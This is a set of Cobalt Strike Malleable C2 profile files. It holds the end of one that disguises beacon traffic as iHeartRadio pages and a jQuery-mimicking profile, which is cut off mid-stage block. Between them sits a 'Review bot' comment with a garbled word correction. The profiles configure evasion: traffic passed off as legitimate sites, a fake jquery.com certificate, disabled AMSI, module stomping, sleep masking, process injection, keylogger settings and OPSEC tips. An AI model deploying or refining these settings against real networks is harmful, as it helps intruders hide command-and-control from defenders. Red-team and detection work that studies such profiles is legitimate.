149 header "X-Timer" "S1499866924.089752,VS0,VE1";
150
151 #just keeping output together for responses
152 output {
153 base64;
154
155 prepend "<!DOCTYPE html>
156 <html lang='en' xmlns:fb='http://ogp.me/ns/fb'>
157 <head>
158 <title>Listen to Hit Nation Radio Live - All of Today's Biggest Hits | iHeartRadio</title>
159 <meta data-react-helmet='true' charset='utf-8'/><meta data-react-helmet='true' name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no'/><meta data-react-helmet='true' name='mobile-web-app-capable' content='yes'/> <link data-react-helmet='true' rel='shortcut icon' href='/assets/favicon.cf2eff6db48eda72637f3c01d6ce99ae.ico?rev=7.33.1' type='image/ico'/><link data-react-helmet='true' rel='apple-touch-icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='shortcut icon' href='/assets/apple-touch-icon.40395b8a92866d7206175b320b251cd3.png?rev=7.33.1'/><link data-react-helmet='true' rel='chrome-webstore-item' href='https://chrome.google.com/webstore/detail/iheartradio/djfamdpdfnbdehpafbeefbpobbohmfnc'/><link data-react-helmet='true' rel='manifest' href='/assets/manifest.828b7817d23e2d62cf3d7e797ae0056f.json?rev=7.33.1'/>
160 <link rel='alternate' href='android-app://com.clearchannel.iheartradio.controller/ihr/goto/live/4422' data-reactid='2'/><link rel='alternate' href='ios-app://290638154/ihr/goto/live/4422' data-reactid='3'/><link rel='search' type='application/opensearchdescription+xml' title='iHeartRadio' href='/assets/opensearch.bb1705850ffcb01dd81ec10d6e177d1c.xml?rev=7.33.1' data-reactid='4'/><link href='https://plus.google.com/+iHeartRadio' rel='author' data-reactid='5'/><link href='https://plus.google.com/+iHeartRadio' rel='publisher' data-reactid='6'/><link rel='canonical' href='https://www.iheart.com/live/hit-nation-4422/' data-reactid='7'/><link rel='image_src' href='https://iscale.iheart.com/catalog/live/4422' data-reactid='8'/><meta name='thumbnail' content='https://iscale.iheart.com/catalog/live/4422' data-reactid='9'/><meta name='description' content='Listen to Hit Nation Live for Free! Hear All of Today&#x27;s Biggest Hits, only on iHeartRadio.' data-reactid='10'/><meta name='keywords' content='Listen,Live,Hit Nation,Digital,NAT,Music,Talk,Radio,Top 40 &amp; Pop,Online,Streaming,Free,iHeartRadio,iHeart' data-reactid='11'/><meta name='twitter:label1' content='Genre' data-reactid='12'/><meta name='twitter:data1' content='Top 40 &amp; Pop' data-reactid='13'/><meta name='twitter:label2' content='Location' data-reactid='14'/><meta name='twitter:data2' content='DIGITAL-NAT' data-reactid='15'/><meta property='fb:app_id' content='121897277851831' data-reactid='16'/> content='https://iscale.iheart.com/catalog/live/4422' data-reactid='21'/>
161 <style class='server-style-loader-element'><href='https://www.iheart.com/live/hit-nation-4422/?autoplayid=";
162
163
164 append "<meta property='og:site_name' content='iHeartRadio' data-reactid='22'/><meta property='og:description' content='Listen to Hit Nation Live for Free! Stream Top 40 &amp; Pop songs online from this radio station, only on iHeartRadio.' data-reactid='23'/><meta itemprop='name' content='Listen to Hit Nation Radio Live - All of Today&#x27;s Biggest Hits' data-reactid='24'/><meta name='twitter:app:name:googleplay' content='iHeartRadio' data-reactid='46'/><meta name='twitter:app:id:googleplay' content='com.clearchannel.iheartradio.controller' data-reactid='47'/><meta property='al:ios:app_store_id' content='290638154' data-reactid='48'/><meta property='al:ios:app_name' content='iHeartRadio' data-reactid='49'/><meta property='al:android:package' content='com.clearchannel.iheartradio.controller' data-reactid='50'/><meta property='al:android:app_name' content='iHeartRadio' data-reactid='51'/>
165 <link rel='stylesheet' type='text/css' href='/assets/web-styles.c28d83ef1f71cb7b9282646a7edecdb0.css?rev=7.33.1'></link>
166 </div></div></div><div id='dialog' data-reactid='103'></div><div id='dialog-secondary' data-reactid='104'></div><div data-reactid='105'><!-- react-empty: 106 --></div><!-- react-empty: 107 --><div data-reactid='108'></div><div data-reactid='109'></div><div class='growls no-growls' data-reactid='110'></div><div class='adblock-bait pub_300x250 pub_300x250m pub_728x90 text-ad textAd text_ad text_ads text-ads text-ad-links' data-reactid='111'></div></div></div>
167 <div id='jw-wrapper' class='hidden'>
168 <div id='jw-player'></div>
169 </div>
170 <div id='ads-wrapper' class='hidden'>
171 <a id='ads-learn-more' target='_blank'>Learn More</a>
172 <div id='ads-player'></div>
173 </div>
174 <script src=/a/locale/?rel=7.33.1></script>
175 <script src=/assets/vendor.a465f0a08a077b19e744.js?rev=7.33.1></script>
176 <script src=/assets/web.a465f0a08a077b19e744.js?rev=7.33.1></script>
177 </body>
178 </html>";
179
180 print;
181 }
182 }
183 }
184
185 http-stager {
186
187 set uri_x86 "/Console";
188 set uri_x64 "/console";
189
190 client{
191 header "Host" "www.iheart.com";
192 header "Accept" "*/*";
193 header "Accept-Language" "en-US";
194 header "Connection" "close";
195 }
196
197 server {
198 header "Server" "nginx/1.4.6 (Ubuntu)";
199 header "Content-Type" "text/html; charset=utf-8";
200 header "Connection" "close";
201
202 }
203
204
205 }
206
207 ###Malleable PE Options###
208
209 post-ex {
210
211 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
212 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
213
214 set obfuscate "true";
215
216 set smartinject "true";
217
218 set amsi_disable "true";
219
220 }
221
222 #use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
223 #don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
224 stage {
225 set checksum "0";
226 set compile_time "25 Oct 2016 01:57:23";
227 set entry_point "170000";
228 #set image_size_x86 "6586368";
229 #set image_size_x64 "6586368";
230 #set name "WWanMM.dll";
231 set userwx "false";
232 set cleanup "true";
233 set sleep_mask "true";
234 set stomppe "true";
235 set obfuscate "true";
236 set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
237
238 #obfuscate beacon before sleep.
239 set sleep_mask "true";
240
241 #module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
242
243 set module_x86 "wwanmm.dll";
244 set module_x64 "wwanmm.dll";
245
246 #transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
247 transform-x86 {
248 prepend "\x90\x90\x90";
249 strrep "ReflectiveLoader" "";
250 strrep "beacon.dll" "";
251 }
252
253 transform-x64 {
254 prepend "\x90\x90\x90";
255 strrep "ReflectiveLoader" "";
256 strrep "beacon.x64.dll" "";
257 }
258
259 }
260
261 process-inject {
262
263 set allocator "NtMapViewOfSection";
264
265 set min_alloc "16700";
266
267 set userwx "false";
268
269 set startrwx "true";
270
271 transform-x86 {
272 prepend "\x90\x90\x90";
273 }
274 transform-x64 {
275 prepend "\x90\x90\x90";
276 }
277
278 execute {
279 CreateThread "ntdll!RtlUserThreadStart";
280 CreateThread;
281 NtQueueApcThread;
282 CreateRemoteThread;
283 RtlCreateUserThread;
284 }
285 }
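Review bot: This profile never sets `sample_name`, so unlike the jQuery profile later in this commit (`set sample_name "jQuery CS 4.2 Profile";`) it carries no name for the indicators-of-compromise report; a line such as `set sample_name "iHeartRadio";` before `set sleeptime` at gutter line 4 would close that gap. The `stage` block also sets `sleep_mask "true"` twice (gutter lines 233 and 239); the second copy, which carries the explanatory comment, is the one to keep and the first should be dropped so a later edit cannot leave the two disagreeing. The header comment at gutter lines 0–2 would read better as `#iHeartRadio profile: mimics a popular top-40 station page ('hit-nation')` with the author tag kept on its own line, since "chose" in the current wording is presumably "chose" for "chosen". The `http-get` and `http-post` server `output` blocks are byte-identical (gutter lines 69–99 and 152–181), which the comment at gutter line 151 acknowledges; a one-line note that both must be edited together would help the next maintainer.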
0 # Malleable C2 Profile
1 # Version: CobaltStrike 4.2
2 # File: jquery-c2.4.2.profile
3 # Description:
4 # c2 profile attempting to mimic a jquery.js request
5 # uses signed certificates
6 # or self-signed certificates
7 # Authors: @joevest, @andrewchiles, @001SPARTaN
8
9 ################################################
10 ## Tips for Profile Parameter Values
11 ################################################
12
13 ## Parameter Values
14 ## Enclose parameter in Double quote, not single
15 ## set useragent "SOME AGENT"; GOOD
16 ## set useragent 'SOME AGENT'; BAD
17
18 ## Some special characters do not need escaping
19 ## prepend "!@#$%^&*()";
20
21 ## Semicolons are ok
22 ## prepend "This is an example;";
23
24 ## Escape Double quotes
25 ## append "here is \"some\" stuff";
26
27 ## Escape Backslashes
28 ## append "more \\ stuff";
29
30 ## HTTP Values
31 ## Program .http-post.client must have a compiled size less than 252 bytes.
32
33 ################################################
34 ## Profile Name
35 ################################################
36 ## Description:
37 ## The name of this profile (used in the Indicators of Compromise report)
38 ## Defaults:
39 ## sample_name: My Profile
40 ## Guidelines:
41 ## - Choose a name that you want in a report
42 set sample_name "jQuery CS 4.2 Profile";
43
44 ################################################
45 ## Sleep Times
46 ################################################
47 ## Description:
48 ## Timing between beacon check in
49 ## Defaults:
50 ## sleeptime: 60000
51 ## jitter: 0
52 ## Guidelines:
53 ## - Beacon Timing in milliseconds (1000 = 1 sec)
54 set sleeptime "45000"; # 45 Seconds
55 #set sleeptime "300000"; # 5 Minutes
56 #set sleeptime "600000"; # 10 Minutes
57 #set sleeptime "900000"; # 15 Minutes
58 #set sleeptime "1200000"; # 20 Minutes
59 #set sleeptime "1800000"; # 30 Minutes
60 #set sleeptime "3600000"; # 1 Hours
61 set jitter "37"; # % jitter
62
63 ################################################
64 ## Server Response Size jitter
65 ################################################
66 ## Description:
67 ## Append random-length string (up to data_jitter value) to http-get and http-post server output.
68 set data_jitter "100";
69
70 ################################################
71 ## HTTP Client Header Removal
72 ################################################
73 ## Description:
74 ## Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process.
75 ## Value:
76 ## headers_remove Comma-separated list of HTTP client headers to remove from Beacon C2.
77 # set headers_remove "Strict-Transport-Security, header2, header3";
78
79 ################################################
80 ## Beacon User-Agent
81 ################################################
82 ## Description:
83 ## User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters
84 ## Defaults:
85 ## useragent: Internet Explorer (Random)
86 ## Guidelines
87 ## - Use a User-Agent values that fits with your engagement
88 ## - useragent can only be 128 chars
89 ## IE 10
90 # set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";
91 ## MS IE 11 User Agent
92 set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
93
94 ################################################
95 ## SSL CERTIFICATE
96 ################################################
97 ## Description:
98 ## Signed or self-signed TLS/SSL Certifcate used for C2 communication using an HTTPS listener
99 ## Defaults:
100 ## All certificate values are blank
101 ## Guidelines:
102 ## - Best Option - Use a certifcate signed by a trusted certificate authority
103 ## - Ok Option - Create your own self signed certificate
104 ## - Option - Set self-signed certificate values
105 https-certificate {
106
107 ## Option 1) Trusted and Signed Certificate
108 ## Use keytool to create a Java Keystore file.
109 ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl
110 ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
111
112 ## Option 2) Create your own Self-Signed Certificate
113 ## Use keytool to import your own self signed certificates
114
115 #set keystore "/pathtokeystore";
116 #set password "password";
117
118 ## Option 3) Cobalt Strike Self-Signed Certificate
119 set C "US";
120 set CN "jquery.com";
121 set O "jQuery";
122 set OU "Certificate Authority";
123 set validity "365";
124 }
125
126 ################################################
127 ## TCP Beacon
128 ################################################
129 ## Description:
130 ## TCP Beacon listen port
131 ## - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
132 ## - https://www.cobaltstrike.com/help-tcp-beacon
133 ## TCP Frame Header
134 ## - Added in CS 4.1, prepend header to TCP Beacon messages
135 ## Defaults:
136 ## tcp_port: 4444
137 ## tcp_frame_header: N\A
138 ## Guidelines
139 ## - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change dynamicaly but the port set in the profile will always be used first before switching to the dynamic port.
140 ## - Use a port other that default. Choose something not is use.
141 ## - Use a port greater than 1024 is generally a good idea
142 set tcp_port "42585";
143 set tcp_frame_header "\x80";
144
145 ################################################
146 ## SMB beacons
147 ################################################
148 ## Description:
149 ## Peer-to-peer beacon using SMB for communication
150 ## SMB Frame Header
151 ## - Added in CS 4.1, prepend header to SMB Beacon messages
152 ## Defaults:
153 ## pipename: msagent_##
154 ## pipename_stager: status_##
155 ## smb_frame_header: N\A
156 ## Guidelines:
157 ## - Do not use an existing namedpipe, Beacon doesn't check for conflict!
158 ## - the ## is replaced with a number unique to a teamserver
159 ## ---------------------
160 set pipename "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
161 set pipename_stager "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
162 set smb_frame_header "\x80";
163
164 ################################################
165 ## DNS beacons
166 ################################################
167 ## Description:
168 ## Beacon that uses DNS for communication
169 ## Defaults:
170 ## maxdns: 255
171 ## dns_idle: 0.0.0.0
172 ## dns_max_txt: 252
173 ## dns_sleep: 0
174 ## dns_stager_prepend: N/A
175 ## dns_stager_subhost: .stage.123456.
176 ## dns_ttl: 1
177 ## Guidelines:
178 ## - DNS beacons generate a lot of DNS request. DNS beacon are best used as low and slow back up C2 channels
179 set maxdns "255";
180 set dns_max_txt "252";
181 set dns_idle "74.125.196.113"; #google.com (change this to match your campaign)
182 set dns_sleep "0"; # Force a sleep prior to each individual DNS request. (in milliseconds)
183 set dns_stager_prepend ".resources.123456.";
184 set dns_stager_subhost ".feeds.123456.";
185
186 ################################################
187 ## SSH beacons
188 ################################################
189 ## Description:
190 ## Peer-to-peer SSH pseudo-Beacon for lateral movement
191 ## ssh_banner
192 ## - Added in Cobalt Strike 4.1, changes client SSH banner
193 ## Defaults:
194 ## ssh_banner: Cobalt Strike 4.2
195 set ssh_banner "OpenSSH_7.4 Debian (protocol 2.0)";
196 set ssh_pipename "wkssvc##";
197
198
199 ################################################
200 ## Staging process
201 ################################################
202 ## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommed to disable staging and use stageless payloads
203 ## Description:
204 ## Malleable C2's http-stager block customizes the HTTP staging process
205 ## Defaults:
206 ## uri_x86 Random String
207 ## uri_x64 Random String
208 ## HTTP Server Headers - Basic HTTP Headers
209 ## HTTP Client Headers - Basic HTTP Headers
210 ## Guidelines:
211 ## - Add customize HTTP headers to the HTTP traffic of your campaign
212 ## - Only specify the `Host` header when peforming domain fronting. Be aware of HTTP proxy's rewriting your request per RFC2616 Section 14.23
213 ## - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
214 ## - Note: Data transform language not supported in http stageing (mask, base64, base64url, etc)
215
216 set host_stage "false"; # Do not use staging. Must use stageles payloads, now the default for Cobalt Strike built-in processes
217 #set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set
218
219 http-stager {
220 set uri_x86 "/jquery-3.3.1.slim.min.js";
221 set uri_x64 "/jquery-3.3.2.slim.min.js";
222
223 server {
224 header "Server" "NetDNA-cache/2.2";
225 header "Cache-Control" "max-age=0, no-cache";
226 header "Pragma" "no-cache";
227 header "Connection" "keep-alive";
228 header "Content-Type" "application/javascript; charset=utf-8";
229 output {
230 ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
231 # 2nd Line
232 prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
233 # 1st Line
234 prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
235 append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
236 print;
237 }
238 }
239
240 client {
241 header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
242 header "Accept-Language" "en-US,en;q=0.5";
243 #header "Host" "code.jquery.com";
244 header "Referer" "http://code.jquery.com/";
245 header "Accept-Encoding" "gzip, deflate";
246 }
247 }
248
249 ################################################
250 ## Post Exploitation
251 ################################################
252 ## Description:
253 ## Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject
254 ## https://www.cobaltstrike.com/help-malleable-postex
255 ## Values:
256 ## spawnto_x86 %windir%\\syswow64\\rundll32.exe
257 ## spawnto_x64 %windir%\\sysnative\\rundll32.exe
258 ## obfuscate false CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way
259 ## pipename postex_####, windows\\pipe_## CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. This option accepts a comma-separated list of pipenames. Cobalt Strike will select a random pipe name from this option when it sets up a post-exploitation job. Each # in the pipename is replaced with a valid hex character as well.
260 ## smartinject false CS 3.14 added to postex block - Directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs.
261 ## amsi_disable false CS 3.13 - Directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities.
262 ## keylogger GetAsyncKeyState CS 4.2 - The GetAsyncKeyState option (default) uses the GetAsyncKeyState API to observe keystrokes. The SetWindowsHookEx option uses SetWindowsHookEx to observe keystrokes.
263 ## threadhint CS 4.2 - allows multi-threaded post-ex DLLs to spawn threads with a spoofed start address. Specify the thread hint as "module!function+0x##" to specify the start address to spoof. The optional 0x## part is an offset added to the start address.
264 ## Guidelines
265 ## - spawnto can only be 63 chars
266 ## - OPSEC WARNING!!!! The spawnto in this example will contain identifiable command line strings
267 ## - sysnative for x64 and syswow64 for x86
268 ## - Example x64 : C:\\Windows\\sysnative\\w32tm.exe
269 ## Example x86 : C:\\Windows\\syswow64\\w32tm.exe
270 ## - The binary doesnt do anything wierd (protected binary, etc)
271 ## - !! Don't use these !!
272 ## - "csrss.exe","logoff.exe","rdpinit.exe","bootim.exe","smss.exe","userinit.exe","sppsvc.exe"
273 ## - A binary that executes without the UAC
274 ## - 64 bit for x64
275 ## - 32 bit for x86
276 ## - You can add command line parameters to blend
277 ## - set spawnto_x86 "%windir%\\syswow64\\svchost.exe -k netsvcs";
278 ## - set spawnto_x64 "%windir%\\sysnative\\svchost.exe -k netsvcs";
279 ## - Note: svchost.exe may look weird as the parent process
280 ## - The obfuscate option scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way. It’s very similar to the obfuscate and userwx options available for Beacon via the stage block.
281 ## - The amsi_disable option directs powerpick, execute-assembly, and psinject to patch the AmsiScanBuffer function before loading .NET or PowerShell code. This limits the Antimalware Scan Interface visibility into these capabilities.
282 ## - The smartinject option directs Beacon to embed key function pointers, like GetProcAddress and LoadLibrary, into its same-architecture post-ex DLLs. This allows post-ex DLLs to bootstrap themselves in a new process without shellcode-like behavior that is detected and mitigated by watching memory accesses to the PEB and kernel32.dll
283
284 post-ex {
285 # Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
286 set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
287 # Hardcode paths like C:\\Windows\\System32\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
288 set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
289 # change the permissions and content of our post-ex DLLs
290 set obfuscate "true";
291 # pass key function pointers from Beacon to its child jobs
292 set smartinject "true";
293 # disable AMSI in powerpick, execute-assembly, and psinject
294 set amsi_disable "true";
295 # Modify our post-ex pipe names
296 set pipename "Winsock2\\CatalogChangeListener-###-0,";
297 set keylogger "GetAsyncKeyState";
298 #set threadhint "module!function+0x##"
299 }
300
301 ################################################
302 ## Memory Indicators
303 ################################################
304 ## Description:
305 ## The stage block in Malleable C2 profiles controls how Beacon is loaded into memory and edit the content of the Beacon Reflective DLL.
306 ## Values:
307 ## allocator VirtualAlloc CS 4.2 - Set how Beacon's Reflective Loader allocates memory for the agent. Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
308 ## checksum 0 The CheckSum value in Beacon's PE header
309 ## cleanup false Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it.
310 ## compile_time 14 July 2009 8:14:00 The build time in Beacon's PE header
311 ## entry_point 92145 The EntryPoint value in Beacon's PE header
312 ## image_size_x64 512000 SizeOfImage value in x64 Beacon's PE header
313 ## image_size_x86 512000 SizeOfImage value in x86 Beacon's PE header
314 ## magic_mz_x86 MZRE CS 4.2 - Override the first bytes (MZ header included) of Beacon's Reflective DLL. Valid x86 instructions are required. Follow instructions that change CPU state with instructions that undo the change.
315 ## magic_mz_x64 MZAR CS 4.2 - Same as magic_mz_x86; affects x64 DLL.
316 ## module_x64 xpsservices.dll Same as module_x86; affects x64 loader
317 ## module_x86 xpsservices.dll Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc.
318 ## magic_pe PE Override the PE character marker used by Beacon's Reflective Loader with another value.
319 ## name beacon.x64.dll The Exported name of the Beacon DLL
320 ## obfuscate false Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. As of 4.2 CS now obfuscates .text section in rDLL package
321 ## rich_header N/A Meta-information inserted by the compiler
322 ## sleep_mask false CS 3.12 - Obfuscate Beacon (HTTP, SMB, TCP Beacons), in-memory, prior to sleeping (HTTP) or waiting for a new connection\data (SMB\TCP)
323 ## smartinject false CS 4.1 added to stage block - Use embedded function pointer hints to bootstrap Beacon agent without walking kernel32 EAT
324 ## stomppe true Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload
325 ## userwx false Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory
326 ## Guidelines:
327 ## - Modify the indicators to minimize in memory indicators
328 # - Refer to
329 ## https://blog.cobaltstrike.com/2018/02/08/in-memory-evasion/
330 ## https://www.youtube.com/playlist?list=PL9HO6M_MU2nc5Q31qd2CwpZ8J4KFMhgnK
331 ## https://www.youtube.com/watch?v=AV4XjxYe4GM (Obfuscate and Sleep)
332 stage {
333
334 # CS 4.2 added allocator and MZ header overrides
335 set allocator "VirtualAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
336 #set magic_mz_x86 "MZRE";
337 #set magic_mz_x64 "MZAR";
338 set magic_pe "NO";
339 set userwx "false";
340 set stomppe "true";
341 set obfuscate "true";
342 set cleanup "true";
343 # CS 3.12 Addition "Obfuscate and Sleep"
344 set sleep_mask "true";
345 # CS 4.1
346 set smartinject "true";
347
348 # Make the Beacon Reflective DLL look like something else in memory
349 # Values captured using peclone agaist a Windows 10 version of explorer.exe
350 set checksum "0";
351 set compile_time "11 Nov 2016 04:08:32";
352 set entry_point "650688";
353 set image_size_x86 "4661248";
354 set image_size_x64 "4661248";
355 set name "srv.dll";
